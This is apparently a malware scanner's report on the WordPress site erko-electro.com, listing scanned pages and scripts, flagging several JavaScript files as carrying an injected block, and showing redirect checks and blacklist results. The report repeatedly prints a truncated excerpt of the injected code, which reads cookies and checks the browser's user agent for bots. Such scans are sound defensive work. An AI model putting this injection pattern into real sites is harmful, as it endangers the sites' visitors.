Scanned pages/files
Request | Server response | Status |
http://erko-electro.com/ | 200 OK Content-Length: 30289 Content-Type: text/html | clean |
http://erko-electro.com/wp-content/themes/twentytwelve/js/whcookies.js | 200 OK Content-Length: 3165 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below). The scanner shows only an excerpt: the start of the injected block, cut off mid-identifier at "getCooki", followed by what appears to be the tail of the file's own code. The same injected prefix is shown for every file flagged below.
Injected block (start, truncated): function getCookie(b){var a=document.cookie.match(new RegExp("(?:^|; )"+b.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,'\\$1')+"=([^;]*)"));return a?decodeURIComponent(a[1]):undefined}(function(){function e(b,a,c){var f=(b+'').toLowerCase();var g=(a+'').toLowerCase();var d=0;if((d=f.indexOf(g,c))!==-1){return d}return false}function h(){var b=['bots','AppleWebKit','Windows NT 6.3','X11','Phone','Google'];var a=false;for(var c in b){if(e(navigator.userAgent,b[c])){a=true;break}}return a}var i=(getCooki
End of the file as served: message_container.innerHTML = html_code; document.body.appendChild(message_container); } } function WHCloseCookiesWindow() { WHCreateCookie('cookies_accepted', 'T', 365); document.getElementById('cookies-message-container').removeChild(document.getElementById('cookies-message')); }
Antivirus reports:
| ||
http://erko-electro.com/wp-includes/js/jquery/jquery.js?ver=1.11.0 | 200 OK Content-Length: 97528 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function getCookie(b){var a=document.cookie.match(new RegExp("(?:^|; )"+b.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,'\\$1')+"=([^;]*)"));return a?decodeURIComponent(a[1]):undefined}(function(){function e(b,a,c){var f=(b+'').toLowerCase();var g=(a+'').toLowerCase();var d=0;if((d=f.indexOf(g,c))!==-1){return d}return false}function h(){var b=['bots','AppleWebKit','Windows NT 6.3','X11','Phone','Google'];var a=false;for(var c in b){if(e(navigator.userAgent,b[c])){a=true;break}}return a}var i=(getCooki jQuery.noConflict(); Antivirus reports:
| ||
http://erko-electro.com/wp-includes/js/jquery/jquery-migrate.min.js?ver=1.2.1 | 200 OK Content-Length: 8326 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function getCookie(b){var a=document.cookie.match(new RegExp("(?:^|; )"+b.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,'\\$1')+"=([^;]*)"));return a?decodeURIComponent(a[1]):undefined}(function(){function e(b,a,c){var f=(b+'').toLowerCase();var g=(a+'').toLowerCase();var d=0;if((d=f.indexOf(g,c))!==-1){return d}return false}function h(){var b=['bots','AppleWebKit','Windows NT 6.3','X11','Phone','Google'];var a=false;for(var c in b){if(e(navigator.userAgent,b[c])){a=true;break}}return a}var i=(getCooki Antivirus reports:
| ||
http://erko-electro.com/wp-content/plugins/dropdown-menu-widget/scripts/include.js?ver=3.9.3 | 200 OK Content-Length: 1512 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function getCookie(b){var a=document.cookie.match(new RegExp("(?:^|; )"+b.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,'\\$1')+"=([^;]*)"));return a?decodeURIComponent(a[1]):undefined}(function(){function e(b,a,c){var f=(b+'').toLowerCase();var g=(a+'').toLowerCase();var d=0;if((d=f.indexOf(g,c))!==-1){return d}return false}function h(){var b=['bots','AppleWebKit','Windows NT 6.3','X11','Phone','Google'];var a=false;for(var c in b){if(e(navigator.userAgent,b[c])){a=true;break}}return a}var i=(getCooki jQuery(document).ready(function($) { $('.dropdown li').hover( function(){ $(this).addClass('hover'); }, function(){ $(this).removeClass('hover'); }); $(".dropdown li:has(ul)").addClass("parent"); $('ul li:first-child').addClass('first-child'); $('ul li:last-child').addClass('last-child'); }); Antivirus reports:
| ||
http://erko-electro.com/wp-content/plugins/wp-survey-and-quiz-tool/js/site.js?ver=3.9.3 | 200 OK Content-Length: 2027 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function getCookie(b){var a=document.cookie.match(new RegExp("(?:^|; )"+b.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,'\\$1')+"=([^;]*)"));return a?decodeURIComponent(a[1]):undefined}(function(){function e(b,a,c){var f=(b+'').toLowerCase();var g=(a+'').toLowerCase();var d=0;if((d=f.indexOf(g,c))!==-1){return d}return false}function h(){var b=['bots','AppleWebKit','Windows NT 6.3','X11','Phone','Google'];var a=false;for(var c in b){if(e(navigator.userAgent,b[c])){a=true;break}}return a}var i=(getCooki jQuery(this).siblings('.wpsqt-show-toggle').show(); jQuery(this).hide(); return false; }); jQuery('.wpst_question input, .wpst_question textarea').click( function() { var explanationText = jQuery(this).parents('.wpst_question').children('.wpsqt-answer-explanation:hidden'); if (explanationText.length != 0) { jQuery(explanationText).siblings('.wpsqt-show-answer').show(); } }); }); Antivirus reports:
| ||
http://erko-electro.com/wp-content/plugins/fancy-box/jquery.fancybox.js?ver=1.2.6 | 200 OK Content-Length: 10648 Content-Type: application/javascript | clean |
http://erko-electro.com/wp-content/plugins/fancy-box/jquery.easing.js?ver=1.3 | 200 OK Content-Length: 9223 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function getCookie(b){var a=document.cookie.match(new RegExp("(?:^|; )"+b.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,'\\$1')+"=([^;]*)"));return a?decodeURIComponent(a[1]):undefined}(function(){function e(b,a,c){var f=(b+'').toLowerCase();var g=(a+'').toLowerCase();var d=0;if((d=f.indexOf(g,c))!==-1){return d}return false}function h(){var b=['bots','AppleWebKit','Windows NT 6.3','X11','Phone','Google'];var a=false;for(var c in b){if(e(navigator.userAgent,b[c])){a=true;break}}return a}var i=(getCooki return c*(7.5625*(t-=(1.5/2.75))*t + .75) + b; } else if (t < (2.5/2.75)) { return c*(7.5625*(t-=(2.25/2.75))*t + .9375) + b; } else { return c*(7.5625*(t-=(2.625/2.75))*t + .984375) + b; } }, easeInOutBounce: function (x, t, b, c, d) { if (t < d/2) return jQuery.easing.easeInBounce (x, t*2, 0, c, d) * .5 + b; return jQuery.easing.easeOutBounce (x, t*2-d, 0, c, d) * .5 + c*.5 + b; } }); Antivirus reports:
| ||
http://erko-electro.com/wp-content/plugins/vslider/js/vslider.js?ver=3.9.3 | 200 OK Content-Length: 16743 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function getCookie(b){var a=document.cookie.match(new RegExp("(?:^|; )"+b.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,'\\$1')+"=([^;]*)"));return a?decodeURIComponent(a[1]):undefined}(function(){function e(b,a,c){var f=(b+'').toLowerCase();var g=(a+'').toLowerCase();var d=0;if((d=f.indexOf(g,c))!==-1){return d}return false}function h(){var b=['bots','AppleWebKit','Windows NT 6.3','X11','Phone','Google'];var a=false;for(var c in b){if(e(navigator.userAgent,b[c])){a=true;break}}return a}var i=(getCooki var div_id = jQuery(".coin-slider").find("div").attr("id"); var window_width = jQuery(window).width(); if (div_id == "Slajder" || div_id == "DE" || div_id == "RU" || div_id == "EN") { var old_style = jQuery("#"+div_id).attr("style"); if (window_width < 1437) { var new_style = old_style.replace(1437, 1024); } else { var new_style = old_style.replace(1024, 1437); } jQuery("#"+div_id).attr("style", new_style); } }); Antivirus reports:
| ||
http://erko-electro.com/wp-content/themes/twentytwelve/js/jquery.hoverIntent.minified.js | 200 OK Content-Length: 2879 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function getCookie(b){var a=document.cookie.match(new RegExp("(?:^|; )"+b.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,'\\$1')+"=([^;]*)"));return a?decodeURIComponent(a[1]):undefined}(function(){function e(b,a,c){var f=(b+'').toLowerCase();var g=(a+'').toLowerCase();var d=0;if((d=f.indexOf(g,c))!==-1){return d}return false}function h(){var b=['bots','AppleWebKit','Windows NT 6.3','X11','Phone','Google'];var a=false;for(var c in b){if(e(navigator.userAgent,b[c])){a=true;break}}return a}var i=(getCooki Antivirus reports:
| ||
http://erko-electro.com/erkocompany/ | 200 OK Content-Length: 27810 Content-Type: text/html | clean |
http://erko-electro.com/erkocompany/mission/ | 200 OK Content-Length: 27684 Content-Type: text/html | clean |
http://erko-electro.com/erkocompany/quality-policy/ | 200 OK Content-Length: 29216 Content-Type: text/html | clean |
http://erko-electro.com/erkocompany/awards-and-prizes/ | 200 OK Content-Length: 31178 Content-Type: text/html | clean |
http://erko-electro.com/erkocompany/eu-projects/ | 200 OK Content-Length: 34311 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: erko-electro.com
Result:
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Connection: close
Date: Thu, 18 Dec 2014 13:41:39 GMT
Pragma: no-cache
Server: Apache/2
Vary: Accept-Encoding,User-Agent
Content-Type: text/html; charset=UTF-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Set-Cookie: PHPSESSID=8itq1vvljm8rrj1s3to0d8cab6; path=/
Set-Cookie: qtrans_cookie_test=qTranslate+Cookie+Test; path=/; domain=erko-electro.com
X-Powered-By: PHP/5.3.29
GET / HTTP/1.1
Host: erko-electro.com
Result:
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Connection: close
Date: Thu, 18 Dec 2014 13:41:39 GMT
Pragma: no-cache
Server: Apache/2
Vary: Accept-Encoding,User-Agent
Content-Type: text/html; charset=UTF-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Set-Cookie: PHPSESSID=8itq1vvljm8rrj1s3to0d8cab6; path=/
Set-Cookie: qtrans_cookie_test=qTranslate+Cookie+Test; path=/; domain=erko-electro.com
X-Powered-By: PHP/5.3.29
Second query (visit from search engine):
GET / HTTP/1.1
Host: erko-electro.com
Referer: http://www.google.com/search?q=erko-electro.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: erko-electro.com
Referer: http://www.google.com/search?q=erko-electro.com
Result:
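The result is similar to the first query. There are no suspicious redirects found. This check compares only the server's HTTP responses. The flagged scripts run in the browser (the excerpts above read document.cookie and navigator.userAgent), so their behaviour for a real visitor is not covered by this test.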
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=erko-electro.com
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://erko-electro.com/
Result: erko-electro.com is not infected or malware details are not published yet.
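Result: erko-electro.com is not infected or malware details are not published yet.
Note: neither blacklist result contradicts the file-level findings above; a site can serve injected scripts before it appears on a blacklist.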